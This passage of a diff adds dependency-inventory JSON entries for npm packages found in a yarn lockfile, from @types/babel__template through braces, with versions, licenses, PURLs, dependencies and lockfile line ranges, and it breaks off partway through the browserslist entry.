"MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/types@7.28.4" + ], + "Locations": [ + { + "StartLine": 2869, + "EndLine": 2874 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@types/babel__template@7.4.4", + "Name": "@types/babel__template", + "Identifier": { + "PURL": "pkg:npm/%40types/babel__template@7.4.4", + "UID": "94cc5dc5d46bcbff" + }, + "Version": "7.4.4", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/parser@7.28.4", + "@babel/types@7.28.4" + ], + "Locations": [ + { + "StartLine": 2876, + "EndLine": 2882 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@types/babel__traverse@7.28.0", + "Name": "@types/babel__traverse", + "Identifier": { + "PURL": "pkg:npm/%40types/babel__traverse@7.28.0", + "UID": "f29af34ed517af1c" + }, + "Version": "7.28.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/types@7.28.4" + ], + "Locations": [ + { + "StartLine": 2884, + "EndLine": 2889 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@types/geojson@7946.0.16", + "Name": "@types/geojson", + "Identifier": { + "PURL": "pkg:npm/%40types/geojson@7946.0.16", + "UID": "59b1f14cb6f11ccc" + }, + "Version": "7946.0.16", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 2891, + "EndLine": 2894 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@types/graceful-fs@4.1.9", + "Name": "@types/graceful-fs", + "Identifier": { + "PURL": "pkg:npm/%40types/graceful-fs@4.1.9", + "UID": "d25dc5f8de9ecfa5" + }, + "Version": "4.1.9", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@types/node@24.7.0" + ], + "Locations": [ + { + "StartLine": 2896, + "EndLine": 2901 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@types/hammerjs@2.0.46", + "Name": "@types/hammerjs", + "Identifier": { + "PURL": "pkg:npm/%40types/hammerjs@2.0.46", + "UID": "4dbd44ca99cf53a3" + }, + "Version": "2.0.46", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 2903, + "EndLine": 2906 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@types/istanbul-lib-coverage@2.0.6", + "Name": "@types/istanbul-lib-coverage", + "Identifier": { + "PURL": "pkg:npm/%40types/istanbul-lib-coverage@2.0.6", + "UID": "812fbadc41e9e493" + }, + "Version": "2.0.6", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 2908, + "EndLine": 2911 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@types/istanbul-lib-report@3.0.3", + "Name": "@types/istanbul-lib-report", + "Identifier": { + "PURL": "pkg:npm/%40types/istanbul-lib-report@3.0.3", + "UID": "41bb742ed03ea1fe" + }, + "Version": "3.0.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@types/istanbul-lib-coverage@2.0.6" + ], + "Locations": [ + { + "StartLine": 2913, + "EndLine": 2918 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@types/istanbul-reports@3.0.4", + "Name": "@types/istanbul-reports", + "Identifier": { + "PURL": "pkg:npm/%40types/istanbul-reports@3.0.4", + "UID": "cad32a184eba69ad" + }, + "Version": "3.0.4", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@types/istanbul-lib-report@3.0.3" + ], + "Locations": [ + { + "StartLine": 2920, + "EndLine": 2925 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@types/minimist@1.2.5", + "Name": "@types/minimist", + "Identifier": { + "PURL": "pkg:npm/%40types/minimist@1.2.5", + "UID": "abb71b0a492b78ec" + }, + "Version": "1.2.5", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 2940, + "EndLine": 2943 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@types/node@24.7.0", + "Name": "@types/node", + "Identifier": { + "PURL": "pkg:npm/%40types/node@24.7.0", + "UID": "778c23fb2f490d4f" + }, + "Version": "24.7.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "undici-types@7.14.0" + ], + "Locations": [ + { + "StartLine": 2945, + "EndLine": 2950 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@types/normalize-package-data@2.4.4", + "Name": "@types/normalize-package-data", + "Identifier": { + "PURL": "pkg:npm/%40types/normalize-package-data@2.4.4", + "UID": "232024d82b1c5783" + }, + "Version": "2.4.4", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 2952, + "EndLine": 2955 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@types/stack-utils@2.0.3", + "Name": "@types/stack-utils", + "Identifier": { + "PURL": "pkg:npm/%40types/stack-utils@2.0.3", + "UID": "b8deef696cd529bd" + }, + "Version": "2.0.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 2998, + "EndLine": 3001 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@types/use-sync-external-store@0.0.6", + "Name": "@types/use-sync-external-store", + "Identifier": { + "PURL": "pkg:npm/%40types/use-sync-external-store@0.0.6", + "UID": "210fdd2f64eb62e2" + }, + "Version": "0.0.6", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 3003, + "EndLine": 3006 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@types/yargs@17.0.33", + "Name": "@types/yargs", + "Identifier": { + "PURL": "pkg:npm/%40types/yargs@17.0.33", + "UID": "2a2e2e4b8e4d977b" + }, + "Version": "17.0.33", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@types/yargs-parser@21.0.3" + ], + "Locations": [ + { + "StartLine": 3013, + "EndLine": 3018 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@types/yargs-parser@21.0.3", + "Name": "@types/yargs-parser", + "Identifier": { + "PURL": "pkg:npm/%40types/yargs-parser@21.0.3", + "UID": "b69e14ff9ff2b4e3" + }, + "Version": "21.0.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 3008, + "EndLine": 3011 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@vscode/sudo-prompt@9.3.1", + "Name": "@vscode/sudo-prompt", + "Identifier": { + "PURL": "pkg:npm/%40vscode/sudo-prompt@9.3.1", + "UID": "80638b4a646b7201" + }, + "Version": "9.3.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 3154, + "EndLine": 3157 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@xmldom/xmldom@0.8.11", + "Name": "@xmldom/xmldom", + "Identifier": { + "PURL": "pkg:npm/%40xmldom/xmldom@0.8.11", + "UID": "df38f0b8448f89b9" + }, + "Version": "0.8.11", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 3159, + "EndLine": 3162 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "abbrev@3.0.1", + "Name": "abbrev", + "Identifier": { + "PURL": "pkg:npm/abbrev@3.0.1", + "UID": "8c80caac6f425bc1" + }, + "Version": "3.0.1", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 3169, + "EndLine": 3170 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "abort-controller@3.0.0", + "Name": "abort-controller", + "Identifier": { + "PURL": "pkg:npm/abort-controller@3.0.0", + "UID": "8930785d9d83d35a" + }, + "Version": "3.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "event-target-shim@5.0.1" + ], + "Locations": [ + { + "StartLine": 3177, + "EndLine": 3182 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "accepts@1.3.8", + "Name": "accepts", + "Identifier": { + "PURL": "pkg:npm/accepts@1.3.8", + "UID": "ad59e1d98e21520e" + }, + "Version": "1.3.8", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "mime-types@2.1.35", + "negotiator@0.6.3" + ], + "Locations": [ + { + "StartLine": 3184, + "EndLine": 3190 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "acorn@8.15.0", + "Name": "acorn", + "Identifier": { + "PURL": "pkg:npm/acorn@8.15.0", + "UID": "5bc4e8bb9f41f235" + }, + "Version": "8.15.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 3197, + "EndLine": 3200 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "agent-base@7.1.4", + "Name": "agent-base", + "Identifier": { + "PURL": "pkg:npm/agent-base@7.1.4", + "UID": "8b9be32dad21fc7f" + }, + "Version": "7.1.4", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 3209, + "EndLine": 3212 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "anser@1.4.10", + "Name": "anser", + "Identifier": { + "PURL": "pkg:npm/anser@1.4.10", + "UID": "e8e56afef3ddc730" + }, + "Version": "1.4.10", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 3246, + "EndLine": 3249 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "ansi-regex@2.1.1", + "Name": "ansi-regex", + "Identifier": { + "PURL": "pkg:npm/ansi-regex@2.1.1", + "UID": "710743c030454fa5" + }, + "Version": "2.1.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 3267, + "EndLine": 3270 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "ansi-regex@5.0.1", + "Name": "ansi-regex", + "Identifier": { + "PURL": "pkg:npm/ansi-regex@5.0.1", + "UID": "4fa61b4a7fa11785" + }, + "Version": "5.0.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 3277, + "EndLine": 3280 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "ansi-regex@6.2.2", + "Name": "ansi-regex", + "Identifier": { + "PURL": "pkg:npm/ansi-regex@6.2.2", + "UID": "277f3413bc9d6cf9" + }, + "Version": "6.2.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 3282, + "EndLine": 3285 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "ansi-styles@3.2.1", + "Name": "ansi-styles", + "Identifier": { + "PURL": "pkg:npm/ansi-styles@3.2.1", + "UID": "201ea8111e2ba751" + }, + "Version": "3.2.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "color-convert@1.9.3" + ], + "Locations": [ + { + "StartLine": 3294, + "EndLine": 3299 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "ansi-styles@4.3.0", + "Name": "ansi-styles", + "Identifier": { + "PURL": "pkg:npm/ansi-styles@4.3.0", + "UID": "d18cd365801425e6" + }, + "Version": "4.3.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "color-convert@2.0.1" + ], + "Locations": [ + { + "StartLine": 3301, + "EndLine": 3306 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "ansi-styles@5.2.0", + "Name": "ansi-styles", + "Identifier": { + "PURL": "pkg:npm/ansi-styles@5.2.0", + "UID": "4e779cb272d4135" + }, + "Version": "5.2.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 3308, + "EndLine": 3311 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "ansi-styles@6.2.3", + "Name": "ansi-styles", + "Identifier": { + "PURL": "pkg:npm/ansi-styles@6.2.3", + "UID": "9bf0fbb47200a3c8" + }, + "Version": "6.2.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 3313, + "EndLine": 3316 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "anymatch@3.1.3", + "Name": "anymatch", + "Identifier": { + "PURL": "pkg:npm/anymatch@3.1.3", + "UID": "aeaf126e15fc33c" + }, + "Version": "3.1.3", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "normalize-path@3.0.0", + "picomatch@2.3.1" + ], + "Locations": [ + { + "StartLine": 3318, + "EndLine": 3324 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "appdirsjs@1.2.7", + "Name": "appdirsjs", + "Identifier": { + "PURL": "pkg:npm/appdirsjs@1.2.7", + "UID": "841c804ef1a69ffe" + }, + "Version": "1.2.7", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 3326, + "EndLine": 3329 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "aproba@1.2.0", + "Name": "aproba", + "Identifier": { + "PURL": "pkg:npm/aproba@1.2.0", + "UID": "bea133996a7db833" + }, + "Version": "1.2.0", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 3331, + "EndLine": 3334 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "aproba@2.1.0", + "Name": "aproba", + "Identifier": { + "PURL": "pkg:npm/aproba@2.1.0", + "UID": "7f87d208e1602cd" + }, + "Version": "2.1.0", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 3336, + "EndLine": 3339 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "archy@1.0.0", + "Name": "archy", + "Identifier": { + "PURL": "pkg:npm/archy@1.0.0", + "UID": "6bd8f39a345572c5" + }, + "Version": "1.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 3341, + "EndLine": 3344 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "are-we-there-yet@1.1.7", + "Name": "are-we-there-yet", + "Identifier": { + "PURL": "pkg:npm/are-we-there-yet@1.1.7", + "UID": "b334386894180b93" + }, + "Version": "1.1.7", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "delegates@1.0.0", + "readable-stream@2.3.8" + ], + "Locations": [ + { + "StartLine": 3354, + "EndLine": 3360 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "argparse@1.0.10", + "Name": "argparse", + "Identifier": { + "PURL": "pkg:npm/argparse@1.0.10", + "UID": "474cd57033f81e9a" + }, + "Version": "1.0.10", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "sprintf-js@1.0.3" + ], + "Locations": [ + { + "StartLine": 3362, + "EndLine": 3367 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "argparse@2.0.1", + "Name": "argparse", + "Identifier": { + "PURL": "pkg:npm/argparse@2.0.1", + "UID": "944b6fb6b036a122" + }, + "Version": "2.0.1", + "Licenses": [ + "Python-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 3369, + "EndLine": 3372 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "argsarray@0.0.1", + "Name": "argsarray", + "Identifier": { + "PURL": "pkg:npm/argsarray@0.0.1", + "UID": "8c6d4d11b4b4e559" + }, + "Version": "0.0.1", + "Licenses": [ + "WTFPL" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 3374, + "EndLine": 3377 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "arrify@1.0.1", + "Name": "arrify", + "Identifier": { + "PURL": "pkg:npm/arrify@1.0.1", + "UID": "7c355d3119954cf" + }, + "Version": "1.0.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 3462, + "EndLine": 3465 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "asap@2.0.6", + "Name": "asap", + "Identifier": { + "PURL": "pkg:npm/asap@2.0.6", + "UID": "2fe1139f3d7c65b2" + }, + "Version": "2.0.6", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 3467, + "EndLine": 3470 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "async-limiter@1.0.1", + "Name": "async-limiter", + "Identifier": { + "PURL": "pkg:npm/async-limiter@1.0.1", + "UID": "c447cac5f10a0f5d" + }, + "Version": "1.0.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 3482, + "EndLine": 3485 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "asynckit@0.4.0", + "Name": "asynckit", + "Identifier": { + "PURL": "pkg:npm/asynckit@0.4.0", + "UID": "62bfc470d5ccbf31" + }, + "Version": "0.4.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 3487, + "EndLine": 3490 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "available-typed-arrays@1.0.7", + "Name": "available-typed-arrays", + "Identifier": { + "PURL": "pkg:npm/available-typed-arrays@1.0.7", + "UID": "6f67fcaf542944fe" + }, + "Version": "1.0.7", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "possible-typed-array-names@1.1.0" + ], + "Locations": [ + { + "StartLine": 3492, + "EndLine": 3497 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "b4a@1.7.3", + "Name": "b4a", + "Identifier": { + "PURL": "pkg:npm/b4a@1.7.3", + "UID": "f6ee978d200c1cfe" + }, + "Version": "1.7.3", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 3508, + "EndLine": 3511 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "babel-jest@29.7.0", + "Name": "babel-jest", + "Identifier": { + "PURL": "pkg:npm/babel-jest@29.7.0", + "UID": "afc0605b79cdd875" + }, + "Version": "29.7.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@jest/transform@29.7.0", + "@types/babel__core@7.20.5", + "babel-plugin-istanbul@6.1.1", + "babel-preset-jest@29.6.3", + "chalk@4.1.2", + "graceful-fs@4.2.11", + "slash@3.0.0" + ], + "Locations": [ + { + "StartLine": 3513, + "EndLine": 3524 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "babel-plugin-istanbul@6.1.1", + "Name": "babel-plugin-istanbul", + "Identifier": { + "PURL": "pkg:npm/babel-plugin-istanbul@6.1.1", + "UID": "aaecefb526190572" + }, + "Version": "6.1.1", + "Licenses": [ + "BSD-3-Clause" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/helper-plugin-utils@7.27.1", + "@istanbuljs/load-nyc-config@1.1.0", + "@istanbuljs/schema@0.1.3", + "istanbul-lib-instrument@5.2.1", + "test-exclude@6.0.0" + ], + "Locations": [ + { + "StartLine": 3533, + "EndLine": 3542 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "babel-plugin-jest-hoist@29.6.3", + "Name": "babel-plugin-jest-hoist", + "Identifier": { + "PURL": "pkg:npm/babel-plugin-jest-hoist@29.6.3", + "UID": "f4241ec4cd342cbd" + }, + "Version": "29.6.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/template@7.27.2", + "@babel/types@7.28.4", + "@types/babel__core@7.20.5", + "@types/babel__traverse@7.28.0" + ], + "Locations": [ + { + "StartLine": 3544, + "EndLine": 3552 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "babel-plugin-syntax-hermes-parser@0.29.1", + "Name": "babel-plugin-syntax-hermes-parser", + "Identifier": { + "PURL": "pkg:npm/babel-plugin-syntax-hermes-parser@0.29.1", + "UID": "ba7495bea430e32f" + }, + "Version": "0.29.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "hermes-parser@0.29.1" + ], + "Locations": [ + { + "StartLine": 3589, + "EndLine": 3594 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "babel-preset-current-node-syntax@1.2.0", + "Name": "babel-preset-current-node-syntax", + "Identifier": { + "PURL": "pkg:npm/babel-preset-current-node-syntax@1.2.0", + "UID": "2f0427ec888a61fc" + }, + "Version": "1.2.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/plugin-syntax-async-generators@7.8.4", + "@babel/plugin-syntax-bigint@7.8.3", + "@babel/plugin-syntax-class-properties@7.12.13", + "@babel/plugin-syntax-class-static-block@7.14.5", + "@babel/plugin-syntax-import-attributes@7.27.1", + "@babel/plugin-syntax-import-meta@7.10.4", + "@babel/plugin-syntax-json-strings@7.8.3", + "@babel/plugin-syntax-logical-assignment-operators@7.10.4", + "@babel/plugin-syntax-nullish-coalescing-operator@7.8.3", + "@babel/plugin-syntax-numeric-separator@7.10.4", + "@babel/plugin-syntax-object-rest-spread@7.8.3", + "@babel/plugin-syntax-optional-catch-binding@7.8.3", + "@babel/plugin-syntax-optional-chaining@7.8.3", + "@babel/plugin-syntax-private-property-in-object@7.14.5", + "@babel/plugin-syntax-top-level-await@7.14.5" + ], + "Locations": [ + { + "StartLine": 3603, + "EndLine": 3622 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "babel-preset-jest@29.6.3", + "Name": "babel-preset-jest", + "Identifier": { + "PURL": "pkg:npm/babel-preset-jest@29.6.3", + "UID": "daf05e4c6b491123" + }, + "Version": "29.6.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "babel-plugin-jest-hoist@29.6.3", + "babel-preset-current-node-syntax@1.2.0" + ], + "Locations": [ + { + "StartLine": 3624, + "EndLine": 3630 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "balanced-match@1.0.2", + "Name": "balanced-match", + "Identifier": { + "PURL": "pkg:npm/balanced-match@1.0.2", + "UID": "6f7bd1a9352c85d4" + }, + "Version": "1.0.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 3632, + "EndLine": 3635 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "bare-events@2.7.0", + "Name": "bare-events", + "Identifier": { + "PURL": "pkg:npm/bare-events@2.7.0", + "UID": "32ab67e75182bb2a" + }, + "Version": "2.7.0", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 3637, + "EndLine": 3640 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "base-64@0.1.0", + "Name": "base-64", + "Identifier": { + "PURL": "pkg:npm/base-64@0.1.0", + "UID": "d293ea3176fedea8" + }, + "Version": "0.1.0", + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 3689, + "EndLine": 3692 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "base64-arraybuffer@1.0.2", + "Name": "base64-arraybuffer", + "Identifier": { + "PURL": "pkg:npm/base64-arraybuffer@1.0.2", + "UID": "8e0795ef4928f692" + }, + "Version": "1.0.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 3694, + "EndLine": 3697 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "base64-js@1.5.1", + "Name": "base64-js", + "Identifier": { + "PURL": "pkg:npm/base64-js@1.5.1", + "UID": "a51e0440680bf68a" + }, + "Version": "1.5.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 3699, + "EndLine": 3702 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "baseline-browser-mapping@2.8.13", + "Name": "baseline-browser-mapping", + "Identifier": { + "PURL": "pkg:npm/baseline-browser-mapping@2.8.13", + "UID": "5d6dfccbfa5ea84" + }, + "Version": "2.8.13", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 3704, + "EndLine": 3707 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "big-integer@1.6.52", + "Name": "big-integer", + "Identifier": { + "PURL": "pkg:npm/big-integer@1.6.52", + "UID": "e32547be9b593839" + }, + "Version": "1.6.52", + "Licenses": [ + "Unlicense" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 3709, + "EndLine": 3712 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "bin-links@5.0.0", + "Name": "bin-links", + "Identifier": { + "PURL": "pkg:npm/bin-links@5.0.0", + "UID": "cfed9cf5466c5cee" + }, + "Version": "5.0.0", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "cmd-shim@7.0.0", + "npm-normalize-package-bin@4.0.0", + "proc-log@5.0.0", + "read-cmd-shim@5.0.0", + "write-file-atomic@6.0.0" + ], + "Locations": [ + { + "StartLine": 3714, + "EndLine": 3721 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "binary-extensions@3.1.0", + "Name": "binary-extensions", + "Identifier": { + "PURL": "pkg:npm/binary-extensions@3.1.0", + "UID": "7ea691e0cb337a00" + }, + "Version": "3.1.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 3723, + "EndLine": 3726 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "bl@4.1.0", + "Name": "bl", + "Identifier": { + "PURL": "pkg:npm/bl@4.1.0", + "UID": "8b533000d21c9994" + }, + "Version": "4.1.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "buffer@5.7.1", + "inherits@2.0.4", + "readable-stream@3.6.2" + ], + "Locations": [ + { + "StartLine": 3735, + "EndLine": 3742 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "boolbase@1.0.0", + "Name": "boolbase", + "Identifier": { + "PURL": "pkg:npm/boolbase@1.0.0", + "UID": "364e8d6e4ebe6b19" + }, + "Version": "1.0.0", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 3762, + "EndLine": 3765 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "bplist-creator@0.1.0", + "Name": "bplist-creator", + "Identifier": { + "PURL": "pkg:npm/bplist-creator@0.1.0", + "UID": "72595fd4e87a2ca9" + }, + "Version": "0.1.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "stream-buffers@2.2.0" + ], + "Locations": [ + { + "StartLine": 3767, + "EndLine": 3772 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "bplist-parser@0.3.1", + "Name": "bplist-parser", + "Identifier": { + "PURL": "pkg:npm/bplist-parser@0.3.1", + "UID": "ebdd1035f0789ced" + }, + "Version": "0.3.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "big-integer@1.6.52" + ], + "Locations": [ + { + "StartLine": 3774, + "EndLine": 3779 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "brace-expansion@1.1.12", + "Name": "brace-expansion", + "Identifier": { + "PURL": "pkg:npm/brace-expansion@1.1.12", + "UID": "972621d048eefceb" + }, + "Version": "1.1.12", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "balanced-match@1.0.2", + "concat-map@0.0.1" + ], + "Locations": [ + { + "StartLine": 3781, + "EndLine": 3787 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "brace-expansion@2.0.2", + "Name": "brace-expansion", + "Identifier": { + "PURL": "pkg:npm/brace-expansion@2.0.2", + "UID": "5e453dd69b965804" + }, + "Version": "2.0.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "balanced-match@1.0.2" + ], + "Locations": [ + { + "StartLine": 3789, + "EndLine": 3794 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "braces@3.0.3", + "Name": "braces", + "Identifier": { + "PURL": "pkg:npm/braces@3.0.3", + "UID": "d637e8d71b109b9a" + }, + "Version": "3.0.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "fill-range@7.1.1" + ], + "Locations": [ + { + "StartLine": 3796, + "EndLine": 3801 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "browserslist@4.26.3", + "Name": 